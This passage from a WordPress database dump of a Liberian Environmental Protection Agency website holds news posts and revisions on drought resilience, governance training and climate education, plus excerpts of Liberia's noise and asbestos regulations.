address climate-induced migration. It is not just a policy move—it is a people-first strategy to ensure that climate justice reaches every corner of the country, \"Dr. Urey Yarkpawolo added.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>                            -30-</code></pre>\n<!-- /wp:code -->','EPA Leads Liberia’s First National Plan to Address Climate-Induced Migration','','inherit','closed','closed','','5454-revision-v1','','','2025-06-19 12:22:18','2025-06-19 12:22:18','',5454,'https://ekmsliberia.info/?p=5456',0,'revision','',0),(5457,38,'2025-06-23 06:41:36','2025-06-23 06:41:36','<!-- wp:paragraph -->\n<p>Cologne, Germany – June 23, 2025 – Liberia is seeking greater international support to strengthen its national response to drought and climate challenges, with Environmental Protection Agency (EPA) Executive Director Dr. Emmanuel K. Urey Yarkpawolo leading the charge at the inaugural Riyadh Global Drought Resilience Partnership (RDRP) conference in Cologne, Germany.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Representing the Liberian government, he was joined in Cologne by EPA’s Multilateral Environmental Agreements (MEAs) Director, Mr. Arthur R. Becker, while Liberia’s UNCCD Focal Point, B. Jallah, participated virtually in the high-level engagement.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr.Urey Yarkpawolo used the international platform to present a clear case for why countries like Liberia must be prioritized for investment and technical support under the global drought initiative. He called on the Partnership to provide Liberia with access to the Readiness Fund to help complete its national drought strategy, build government capacity, and develop major projects ready for donor funding.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Our people are already living through the effects of drought. It’s not just about weather, it’s about food, water, land, and the lives of ordinary Liberians,” Dr. Urey Yarkpawolo told the gathering of global leaders, development partners, and climate experts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He described drought as a direct threat to Liberia’s food security, economic growth, and national stability, especially in rural areas where farming and natural resources are key to daily survival. Dr.Urey Yarkpawolo stressed the need to act before things worsen, shifting from reactive responses to long-term planning and resilience building.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia, he explained, has already taken steps toward climate-smart development. Through the National Agriculture Development Plan (2024–2030), the country is focusing on restoring healthy soils, protecting water sources, and promoting sustainable food systems. At the same time, the government is implementing its ARREST Agenda—which stands for Agriculture, Roads, Rule of Law, Education, Sanitation, and Tourism, to drive inclusive rural development and environmental protection.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At the heart of Liberia’s plan is the empowerment of local communities. Dr. Urey Yarkpawolo emphasized the importance of involving women, youth, and smallholder farmers in designing and monitoring drought resilience programs. He also highlighted the need for early warning systems that can guide farmers and local officials before disaster strikes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>While Liberia’s ambition is high, the country continues to face financial and technical limitations. That is why, according to Dr. Urey Yarkpawolo, access to international support, especially from the RDRP Readiness Fund, is critical to making progress.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Liberia is not asking for charity, we are asking for partnership. A partnership that is flexible, transparent, and tailored to the real needs of vulnerable nations,” he said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Urey Yarkpawolo thanked the UN Convention to Combat Desertification (UNCCD) and the Kingdom of Saudi Arabia for bringing countries together under the RDRP and giving nations like Liberia a seat at the table.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He reaffirmed Liberia’s full commitment to a drought-resilient and sustainable future, saying the country stands ready to work with international partners to turn ideas into action and action into hope.</p>\n<!-- /wp:paragraph -->','Liberia Pushes for Global Drought Partnership Support Under Dr. Urey Yarkpawolo’s Leadership','','publish','open','open','','liberia-pushes-for-global-drought-partnership-support-under-dr-urey-yarkpawolos-leadership','','','2025-06-24 06:51:14','2025-06-24 06:51:14','',0,'https://ekmsliberia.info/?p=5457',55,'post','',0),(5458,38,'2025-06-24 06:47:18','2025-06-24 06:47:18','','WhatsApp Image 2025-06-23 at 12.20.20 (1)','','inherit','open','closed','','whatsapp-image-2025-06-23-at-12-20-20-1','','','2025-06-24 06:47:18','2025-06-24 06:47:18','',5457,'https://ekmsliberia.info/wp-content/uploads/2025/06/WhatsApp-Image-2025-06-23-at-12.20.20-1.jpeg',0,'attachment','image/jpeg',0),(5459,38,'2025-06-24 06:48:22','2025-06-24 06:48:22','','Template','','inherit','open','closed','','template','','','2025-06-24 06:48:22','2025-06-24 06:48:22','',5457,'https://ekmsliberia.info/wp-content/uploads/2025/06/Template.png',0,'attachment','image/png',0),(5460,38,'2025-06-24 06:49:29','2025-06-24 06:49:29','<!-- wp:paragraph -->\n<p>Cologne, Germany – June 23, 2025 – Liberia is seeking greater international support to strengthen its national response to drought and climate challenges, with Environmental Protection Agency (EPA) Executive Director Dr. Emmanuel K. Urey Yarkpawolo leading the charge at the inaugural Riyadh Global Drought Resilience Partnership (RDRP) conference in Cologne, Germany.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Representing the Liberian government, he was joined in Cologne by EPA’s Multilateral Environmental Agreements (MEAs) Director, Mr. Arthur R. Becker, while Liberia’s UNCCD Focal Point, B. Jallah, participated virtually in the high-level engagement.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr.Urey Yarkpawolo used the international platform to present a clear case for why countries like Liberia must be prioritized for investment and technical support under the global drought initiative. He called on the Partnership to provide Liberia with access to the Readiness Fund to help complete its national drought strategy, build government capacity, and develop major projects ready for donor funding.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Our people are already living through the effects of drought. It’s not just about weather, it’s about food, water, land, and the lives of ordinary Liberians,” Dr. Urey Yarkpawolo told the gathering of global leaders, development partners, and climate experts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He described drought as a direct threat to Liberia’s food security, economic growth, and national stability, especially in rural areas where farming and natural resources are key to daily survival. Dr.Urey Yarkpawolo stressed the need to act before things worsen, shifting from reactive responses to long-term planning and resilience building.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia, he explained, has already taken steps toward climate-smart development. Through the National Agriculture Development Plan (2024–2030), the country is focusing on restoring healthy soils, protecting water sources, and promoting sustainable food systems. At the same time, the government is implementing its ARREST Agenda—which stands for Agriculture, Roads, Rule of Law, Education, Sanitation, and Tourism, to drive inclusive rural development and environmental protection.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At the heart of Liberia’s plan is the empowerment of local communities. Dr. Urey Yarkpawolo emphasized the importance of involving women, youth, and smallholder farmers in designing and monitoring drought resilience programs. He also highlighted the need for early warning systems that can guide farmers and local officials before disaster strikes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>While Liberia’s ambition is high, the country continues to face financial and technical limitations. That is why, according to Dr. Urey Yarkpawolo, access to international support, especially from the RDRP Readiness Fund, is critical to making progress.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Liberia is not asking for charity, we are asking for partnership. A partnership that is flexible, transparent, and tailored to the real needs of vulnerable nations,” he said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Urey Yarkpawolo thanked the UN Convention to Combat Desertification (UNCCD) and the Kingdom of Saudi Arabia for bringing countries together under the RDRP and giving nations like Liberia a seat at the table.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He reaffirmed Liberia’s full commitment to a drought-resilient and sustainable future, saying the country stands ready to work with international partners to turn ideas into action and action into hope.</p>\n<!-- /wp:paragraph -->','Liberia Pushes for Global Drought Partnership Support Under Dr. Urey Yarkpawolo’s Leadership','','inherit','closed','closed','','5457-revision-v1','','','2025-06-24 06:49:29','2025-06-24 06:49:29','',5457,'https://ekmsliberia.info/?p=5460',0,'revision','',0),(5461,38,'2025-06-24 14:15:35','2025-06-24 14:15:35','<!-- wp:paragraph -->\n<p>Beijing, China – June 23, 2025 –The Technical Assistant in the Office of the Deputy Executive Director at the Environmental Protection Agency (EPA) of Liberia, Mr. Mcsimon P. Garvlehn, is currently participating in an international seminar on public administration and modern governance in Beijing, China.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Garvlehn is one of twenty Liberian government officials selected from various ministries and agencies to attend the training, which runs for two weeks. The program is organized by the Academy of International Business Officials (AIBO) through the Ministry of Commerce of the People’s Republic of China.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The seminar began on June 12, 2025, and is focused on sharing knowledge and experiences in governance, public administration, and development strategies. It offers Liberia a chance to strengthen its governance sector by exposing public servants to new ideas and practical approaches used in other parts of the world.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Liberian delegation is led by Hon. George Thomas Marshall, Assistant Minister for Special Services at the Ministry of State for Presidential Affairs. He is supported by Hon. Prince Menkalo Gbieu, Chief of Staff in the Office of the Vice President.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As part of the seminar, the participants visited Langfang City where they took part in the World Cross-Border E-Commerce and Trade Conference. The event brought together leaders from over 50 countries and highlighted industries such as artificial intelligence, robotics, and logistics.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The team also traveled to Xiamen City in Fujian Province. There, they toured the Jimei economic zone and visited major Chinese companies including Fuquan Steel, AIforceteh, Suntar Technology, and New Energy BAIC Automotive.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For Mr. Garvlehn and his colleagues, the training is expected to help improve service delivery and policy planning in Liberia. It also builds on the growing partnership between Liberia and China in the area of human capacity development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>AIBO is a Chinese government training institution under the Ministry of Commerce. It was founded in 1980 and is located in Beijing. The academy runs programs for government officials from developing countries around the world. Since 1998, AIBO has trained nearly 70,000 people through over 2,000 workshops and seminars.</p>\n<!-- /wp:paragraph -->','EPA’s McSimon Garvlehn Among Liberians Trained in Modern Governance in China','','publish','open','open','','epas-mcsimon-garvlehn-among-liberians-trained-in-modern-governance-in-china','','','2025-06-24 14:15:37','2025-06-24 14:15:37','',0,'https://ekmsliberia.info/?p=5461',54,'post','',0),(5462,38,'2025-06-24 14:15:23','2025-06-24 14:15:23','','News','','inherit','open','closed','','news-3','','','2025-06-24 14:15:23','2025-06-24 14:15:23','',5461,'https://ekmsliberia.info/wp-content/uploads/2025/06/News.jpeg',0,'attachment','image/jpeg',0),(5463,38,'2025-06-24 14:15:35','2025-06-24 14:15:35','<!-- wp:paragraph -->\n<p>Beijing, China – June 23, 2025 –The Technical Assistant in the Office of the Deputy Executive Director at the Environmental Protection Agency (EPA) of Liberia, Mr. Mcsimon P. Garvlehn, is currently participating in an international seminar on public administration and modern governance in Beijing, China.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Garvlehn is one of twenty Liberian government officials selected from various ministries and agencies to attend the training, which runs for two weeks. The program is organized by the Academy of International Business Officials (AIBO) through the Ministry of Commerce of the People’s Republic of China.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The seminar began on June 12, 2025, and is focused on sharing knowledge and experiences in governance, public administration, and development strategies. It offers Liberia a chance to strengthen its governance sector by exposing public servants to new ideas and practical approaches used in other parts of the world.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Liberian delegation is led by Hon. George Thomas Marshall, Assistant Minister for Special Services at the Ministry of State for Presidential Affairs. He is supported by Hon. Prince Menkalo Gbieu, Chief of Staff in the Office of the Vice President.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As part of the seminar, the participants visited Langfang City where they took part in the World Cross-Border E-Commerce and Trade Conference. The event brought together leaders from over 50 countries and highlighted industries such as artificial intelligence, robotics, and logistics.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The team also traveled to Xiamen City in Fujian Province. There, they toured the Jimei economic zone and visited major Chinese companies including Fuquan Steel, AIforceteh, Suntar Technology, and New Energy BAIC Automotive.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For Mr. Garvlehn and his colleagues, the training is expected to help improve service delivery and policy planning in Liberia. It also builds on the growing partnership between Liberia and China in the area of human capacity development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>AIBO is a Chinese government training institution under the Ministry of Commerce. It was founded in 1980 and is located in Beijing. The academy runs programs for government officials from developing countries around the world. Since 1998, AIBO has trained nearly 70,000 people through over 2,000 workshops and seminars.</p>\n<!-- /wp:paragraph -->','EPA’s McSimon Garvlehn Among Liberians Trained in Modern Governance in China','','inherit','closed','closed','','5461-revision-v1','','','2025-06-24 14:15:35','2025-06-24 14:15:35','',5461,'https://ekmsliberia.info/?p=5463',0,'revision','',0),(5464,38,'2025-06-24 18:22:52','2025-06-24 18:22:52','<!-- wp:paragraph -->\n<p>Bonn, Germany – June 24, 2025 – Liberia’s Teddy Taylor, the National Focal Point for Action for Climate Empowerment at the Environmental Protection Agency (EPA), is gaining international recognition for his strong advocacy on climate education, as he represented Liberia at a high-level consultation on adaptation education hosted by the Global Center on Adaptation (GCA) in Bonn, Germany.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking during a special breakfast meeting on the sidelines of the UNFCCC SB62 Climate Conference Tuesday, Mr. Taylor made a passionate case for why education must be a central part of Africa’s response to climate change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Taylor outlined the major challenges Liberia faces in delivering climate adaptation education, especially in vulnerable communities. He pointed to schools being damaged by floods, lack of climate content in national curricula, limited teacher training, and budget constraints as key obstacles.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Our school system is at risk because of the changing climate,” Mr. Taylor said. “Teachers need support, our buildings need strengthening, and our young people need the knowledge to face what lies ahead.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>During the event, GCA presented two proposals under its Africa Adaptation Acceleration Program 2.0: Climate-Proofing Education Services and Driving Public Awareness and Adaptation Literacy. Mr. Taylor expressed Liberia’s full support for both.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“These are the right interventions at the right time,” he said. “They match our national efforts to build a resilient education system.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He explained that Liberia is already working on a Climate Change Learning Strategy with support from UNITAR, and the country is looking to partners like GCA to help bring it to life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Taylor didn’t just speak about the problems—he came with solutions. He proposed that Liberia be considered for a pilot program to build climate-resilient schools in areas most at risk. He also called for support to create a national adaptation education framework that would align with Liberia’s broader plans, including the Education Sector Plan and National Adaptation Plan (NAP).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We are ready to act,” he told the gathering. “We want to work with GCA, UNICEF, UNITAR, and others to train teachers, update our curriculum, and bring climate knowledge into every classroom.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Taylor emphasized that the focus should not only be on students in school, but also on teachers, out-of-school youth, and communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Young people and community leaders are powerful messengers,” he said. “We must use youth clubs, radio, social media, and vocational training to spread climate knowledge across the country.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>His presentation was met with praise from development partners and fellow representatives at the forum, many of whom commended Liberia’s commitment and Mr. Taylor’s leadership.</p>\n<!-- /wp:paragraph -->','EPA\'s Teddy Taylor Earns Global Praise for Promoting Climate Education in Africa','','publish','open','open','','epas-teddy-taylor-earns-global-praise-for-promoting-climate-education-in-africa','','','2025-06-24 18:22:56','2025-06-24 18:22:56','',0,'https://ekmsliberia.info/?p=5464',53,'post','',0),(5465,38,'2025-06-24 18:22:33','2025-06-24 18:22:33','','WhatsApp Image 2025-06-24 at 17.54.56','','inherit','open','closed','','whatsapp-image-2025-06-24-at-17-54-56','','','2025-06-24 18:22:33','2025-06-24 18:22:33','',5464,'https://ekmsliberia.info/wp-content/uploads/2025/06/WhatsApp-Image-2025-06-24-at-17.54.56.jpeg',0,'attachment','image/jpeg',0),(5466,38,'2025-06-24 18:22:52','2025-06-24 18:22:52','<!-- wp:paragraph -->\n<p>Bonn, Germany – June 24, 2025 – Liberia’s Teddy Taylor, the National Focal Point for Action for Climate Empowerment at the Environmental Protection Agency (EPA), is gaining international recognition for his strong advocacy on climate education, as he represented Liberia at a high-level consultation on adaptation education hosted by the Global Center on Adaptation (GCA) in Bonn, Germany.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking during a special breakfast meeting on the sidelines of the UNFCCC SB62 Climate Conference Tuesday, Mr. Taylor made a passionate case for why education must be a central part of Africa’s response to climate change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Taylor outlined the major challenges Liberia faces in delivering climate adaptation education, especially in vulnerable communities. He pointed to schools being damaged by floods, lack of climate content in national curricula, limited teacher training, and budget constraints as key obstacles.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Our school system is at risk because of the changing climate,” Mr. Taylor said. “Teachers need support, our buildings need strengthening, and our young people need the knowledge to face what lies ahead.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>During the event, GCA presented two proposals under its Africa Adaptation Acceleration Program 2.0: Climate-Proofing Education Services and Driving Public Awareness and Adaptation Literacy. Mr. Taylor expressed Liberia’s full support for both.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“These are the right interventions at the right time,” he said. “They match our national efforts to build a resilient education system.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He explained that Liberia is already working on a Climate Change Learning Strategy with support from UNITAR, and the country is looking to partners like GCA to help bring it to life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Taylor didn’t just speak about the problems—he came with solutions. He proposed that Liberia be considered for a pilot program to build climate-resilient schools in areas most at risk. He also called for support to create a national adaptation education framework that would align with Liberia’s broader plans, including the Education Sector Plan and National Adaptation Plan (NAP).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We are ready to act,” he told the gathering. “We want to work with GCA, UNICEF, UNITAR, and others to train teachers, update our curriculum, and bring climate knowledge into every classroom.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Taylor emphasized that the focus should not only be on students in school, but also on teachers, out-of-school youth, and communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Young people and community leaders are powerful messengers,” he said. “We must use youth clubs, radio, social media, and vocational training to spread climate knowledge across the country.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>His presentation was met with praise from development partners and fellow representatives at the forum, many of whom commended Liberia’s commitment and Mr. Taylor’s leadership.</p>\n<!-- /wp:paragraph -->','EPA\'s Teddy Taylor Earns Global Praise for Promoting Climate Education in Africa','','inherit','closed','closed','','5464-revision-v1','','','2025-06-24 18:22:52','2025-06-24 18:22:52','',5464,'https://ekmsliberia.info/?p=5466',0,'revision','',0),(5467,38,'2017-07-04 07:24:49','2017-07-04 07:24:49','<div class=\"page\" title=\"Page 5\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nIN EXERCISE of the powers conferred by the Environmental Protection &amp; Management Act (Section 41, 42 &amp; 43), the Environment Protection Agency makes the following Regulations:-\r\n<div class=\"page\" title=\"Page 5\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nNOISE POLLUTION CONTROL &amp; STANDARDS REGULATIONS, 2009\r\n\r\n</div>\r\n</div>\r\n<table><colgroup> <col /> <col /></colgroup>\r\n<tbody>\r\n<tr>\r\n<td>\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nShort Title.\r\n\r\nInterpretation.\r\n\r\n</div>\r\n</div></td>\r\n<td>\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nPART I - PRELIMINARY PROVISIONS\r\n\r\n1. These Regulations may be cited as the Noise Pollution Control &amp; Standards Regulations, 2009.\r\n\r\n2. In these Regulations, unless the context otherwise requires- “Act” means the Environment Protection &amp; Management Law of\r\n\r\nLiberia 2003;\r\n“action plan” means a plan designed for the purpose of managing noise or excessive vibrations and their effects, including reduction of noise or excessive vibrations ; “Agency” means the Environment Protection Agency established under Section 4 of the Environment Protection Agency Act 2003; “commercial zone” means any place where goods and services are exchanged, bought or sold; “construction” includes erection, alteration, repair, dismantling, demolition, structural maintenance, painting, mowing, land clearing, earth-moving, landscaping, grading, excavating,\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Environmental Protection Agency Noise Pollution Control & Standards Regulation, 2017','','publish','closed','closed','','environmental-protection-agency-noise-pollution-control-standards-regulation-2017','','','2025-06-25 07:28:51','2025-06-25 07:28:51','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5467',17,'document','',0),(5468,38,'2025-06-24 20:37:10','2025-06-24 20:37:10','','Screenshot 2025-06-24 at 6.55.49 AM','','inherit','open','closed','','screenshot-2025-06-24-at-6-55-49-am','','','2025-06-24 20:37:10','2025-06-24 20:37:10','',5467,'https://ekmsliberia.info/wp-content/uploads/2025/06/Screenshot-2025-06-24-at-6.55.49-AM.png',0,'attachment','image/png',0),(5469,38,'2025-06-25 07:21:27','2025-06-25 07:21:27','','Noise Regulations of Liberia No 2-17','','inherit','open','closed','','noise-regulations-of-liberia-no-2-17','','','2025-06-25 07:21:27','2025-06-25 07:21:27','',5467,'https://ekmsliberia.info/wp-content/uploads/2025/06/Noise-Regulations-of-Liberia-No-2-17.pdf',0,'attachment','application/pdf',0),(5470,38,'2025-06-25 07:24:49','2025-06-25 07:24:49','<div class=\"page\" title=\"Page 5\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nIN EXERCISE of the powers conferred by the Environmental Protection &amp; Management Act (Section 41, 42 &amp; 43), the Environment Protection Agency makes the following Regulations:-\r\n<div class=\"page\" title=\"Page 5\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nNOISE POLLUTION CONTROL &amp; STANDARDS REGULATIONS, 2009\r\n\r\n</div>\r\n</div>\r\n<table><colgroup><col /><col /></colgroup>\r\n<tbody>\r\n<tr>\r\n<td>\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nShort Title.\r\n\r\nInterpretation.\r\n\r\n</div>\r\n</div></td>\r\n<td>\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nPART I - PRELIMINARY PROVISIONS\r\n\r\n1. These Regulations may be cited as the Noise Pollution Control &amp; Standards Regulations, 2009.\r\n\r\n2. In these Regulations, unless the context otherwise requires- “Act” means the Environment Protection &amp; Management Law of\r\n\r\nLiberia 2003;\r\n“action plan” means a plan designed for the purpose of managing noise or excessive vibrations and their effects, including reduction of noise or excessive vibrations ; “Agency” means the Environment Protection Agency established under Section 4 of the Environment Protection Agency Act 2003; “commercial zone” means any place where goods and services are exchanged, bought or sold; “construction” includes erection, alteration, repair, dismantling, demolition, structural maintenance, painting, mowing, land clearing, earth-moving, landscaping, grading, excavating,\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Environmental Protection Agency Noise Pollution Control & Standards Regulation, 2017','','inherit','closed','closed','','5467-revision-v1','','','2025-06-25 07:24:49','2025-06-25 07:24:49','',5467,'https://ekmsliberia.info/?p=5470',0,'revision','',0),(5471,38,'2025-06-25 07:26:35','2025-06-25 07:26:35','<div class=\"page\" title=\"Page 5\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nIN EXERCISE of the powers conferred by the Environmental Protection &amp; Management Act (Section 41, 42 &amp; 43), the Environment Protection Agency makes the following Regulations:-\r\n<div class=\"page\" title=\"Page 5\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nNOISE POLLUTION CONTROL &amp; STANDARDS REGULATIONS, 2009\r\n\r\n</div>\r\n</div>\r\n<table><colgroup> <col /> <col /></colgroup>\r\n<tbody>\r\n<tr>\r\n<td>\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nShort Title.\r\n\r\nInterpretation.\r\n\r\n</div>\r\n</div></td>\r\n<td>\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nPART I - PRELIMINARY PROVISIONS\r\n\r\n1. These Regulations may be cited as the Noise Pollution Control &amp; Standards Regulations, 2009.\r\n\r\n2. In these Regulations, unless the context otherwise requires- “Act” means the Environment Protection &amp; Management Law of\r\n\r\nLiberia 2003;\r\n“action plan” means a plan designed for the purpose of managing noise or excessive vibrations and their effects, including reduction of noise or excessive vibrations ; “Agency” means the Environment Protection Agency established under Section 4 of the Environment Protection Agency Act 2003; “commercial zone” means any place where goods and services are exchanged, bought or sold; “construction” includes erection, alteration, repair, dismantling, demolition, structural maintenance, painting, mowing, land clearing, earth-moving, landscaping, grading, excavating,\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Environmental Protection Agency Noise Pollution Control & Standards Regulation, 2017','','inherit','closed','closed','','5467-revision-v1','','','2025-06-25 07:26:35','2025-06-25 07:26:35','',5467,'https://ekmsliberia.info/?p=5471',0,'revision','',0),(5472,38,'2017-04-07 07:48:10','2017-04-07 07:48:10','<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nRegulation on the <strong>Production</strong>, <strong>Importation</strong>, <strong>Handling</strong>, <strong>Sale</strong>, <strong>Segregation</strong>, <strong>Transportation</strong>, <strong>Use</strong>, <strong>Storage</strong>, and <strong>Trade in and Disposal</strong> of Asbestos and Materials containing Asbestos in Liberia\r\n\r\n<strong>Definitions</strong>\r\n\r\n<strong>Asbestos:-</strong> Asbestos is the name given to a number of naturally occurring fibrous minerals with high tensile strength, the ability to be woven, and resistance to heat ad most chemicals. In most developed countries, including America, Asbestos is defined as the asbestiform varieties of chrysotile *serpentine); crocidolite (riebeckite); amosite (cummingtonite/grunerite); anthophyilite; tremolite; and actinolite. Any substance or material therefore containing 1% or more of any of the asbestiform varieties specified above is asbestos.\r\n\r\n<strong>Asbestos fiber:</strong>-a particle of asbestos that is not less than 5 micrometers in length, and is less than 3 micrometers in width, and has a length to width ratio of not less than 3:1.\r\n\r\n<strong>Health Effects of Exposure to Asbestos</strong>\r\n\r\nExposure to airborne friable asbestos may result in a potential health risk because persons breathing the air may breathe in asbestos fibers. Continual exposure to asbestos can increase the amount of fibers that remain in the lung. Fibers embedded in the lung tissue over time may cause serious lung diseases, including asbestos, lung cancer, or mesothelioma. Smoking increases the risk of developing illness from exposure to asbestos.\r\n\r\n</div>\r\n</div>\r\n</div>','ASBESTOS REGULATION OF LIBERIA','','publish','closed','closed','','asbestos-regulation-of-liberia','','','2025-06-25 07:56:22','2025-06-25 07:56:22','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5472',16,'document','',0),(5473,38,'2025-06-25 07:46:03','2025-06-25 07:46:03','','Screenshot 2025-06-25 at 7.42.38 AM','','inherit','open','closed','','screenshot-2025-06-25-at-7-42-38-am','','','2025-06-25 07:46:03','2025-06-25 07:46:03','',5472,'https://ekmsliberia.info/wp-content/uploads/2025/06/Screenshot-2025-06-25-at-7.42.38-AM.png',0,'attachment','image/png',0),(5474,38,'2025-06-25 07:46:34','2025-06-25 07:46:34','','Asbestos Regulation No 1-17','','inherit','open','closed','','asbestos-regulation-no-1-17','','','2025-06-25 07:46:34','2025-06-25 07:46:34','',5472,'https://ekmsliberia.info/wp-content/uploads/2025/06/Asbestos-Regulation-No-1-17.pdf',0,'attachment','application/pdf',0),(5475,38,'2025-06-25 07:48:10','2025-06-25 07:48:10','<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nRegulation on the <strong>Production</strong>, <strong>Importation</strong>, <strong>Handling</strong>, <strong>Sale</strong>, <strong>Segregation</strong>, <strong>Transportation</strong>, <strong>Use</strong>, <strong>Storage</strong>, and <strong>Trade in and Disposal</strong> of Asbestos and Materials containing Asbestos in Liberia\r\n\r\n<strong>Definitions</strong>\r\n\r\n<strong>Asbestos:-</strong> Asbestos is the name given to a number of naturally occurring fibrous minerals with high tensile strength, the ability to be woven, and resistance to heat ad most chemicals. In most developed countries, including America, Asbestos is defined as the asbestiform varieties of chrysotile *serpentine); crocidolite (riebeckite); amosite (cummingtonite/grunerite); anthophyilite; tremolite; and actinolite. Any substance or material therefore containing 1% or more of any of the asbestiform varieties specified above is asbestos.\r\n\r\n<strong>Asbestos fiber:</strong>-a particle of asbestos that is not less than 5 micrometers in length, and is less than 3 micrometers in width, and has a length to width ratio of not less than 3:1.\r\n\r\n<strong>Health Effects of Exposure to Asbestos</strong>\r\n\r\nExposure to airborne friable asbestos may result in a potential health risk because persons breathing the air may breathe in asbestos fibers. Continual exposure to asbestos can increase the amount of fibers that remain in the 